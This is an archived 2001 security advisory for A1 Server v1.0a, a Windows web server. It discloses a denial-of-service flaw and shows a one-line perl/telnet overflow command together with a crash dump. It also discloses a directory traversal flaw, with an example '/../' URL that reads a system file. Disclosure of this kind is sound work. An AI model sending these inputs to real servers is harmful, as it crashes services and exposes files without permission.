OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: slipyB10Z.NET
Date: Mon Feb 26 2001 - 22:53:54 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Introduction:

    A1 Server v1.0a is a HTTPd server for the Windows
    OS, and it will deliver the following content: GIF
    impages, HTM or HTML pages, EXE files, and ZIP
    files. The server is very small, but yet somewhat
    stable and is freeware! (Yeah. right)

    The Vendors website is:
    http://msnhomepages.talkcity.com/windowsway/lriver
    2/a1server.htm

    Problem #1 : Denial of Service Attack

    A1 Server v1.0a is vulnerable to a nasty Denial of
    Service attack where it can be flooded with useless
    junk until the server crashes promptly. Once it has
    been crashed it needs to be restarted again for it to
    work properly. All windows versions apear to be
    affected.

    Example:

    echo `perl -e 'print "A" x 1000'` | telnet a1server 80

    ^^ = Will cause the program to quit within seconds
    and display:

    A1SERVER caused an invalid page fault in module
    A1SERVER.EXE at 016f:004101ae.
    Registers:
    EAX=00000000 CS=016f EIP=004101ae
    EFLGS=00010246 EBX=00420094 SS=0177
    ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177
    ESI=00000001 FS=6417 EDX=004263b2 ES=0177
    EDI=00000001 GS=5e47 Bytes at CS:EIP:
    f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc
    Stack dump:
    004211a8 0000001c 006bfca8 004151db 004211a8
    00000001 006bfcb0 00008d20 006bfcfc bff7b796
    bffc9490 00000177 006bfcb8 bff7b828 006bfcc8
    bff7363b

    Problem #2 : Directory Traversal

    Adding the string "/../" to an URL allows an attacker to
    view any file on the server provided you know where
    the file is at in the first place.

    Example:

    http://www.a1server.win/../../../../../../Scandisk.log

    ^^ = Will obviously open the Scandisk.log fiel.

    Vendor has been notified. No e-mail reply yet.

    --------------------
    b10z HTTPd Advisory
    slipyb10z.net

    Found: February 26th, 2001.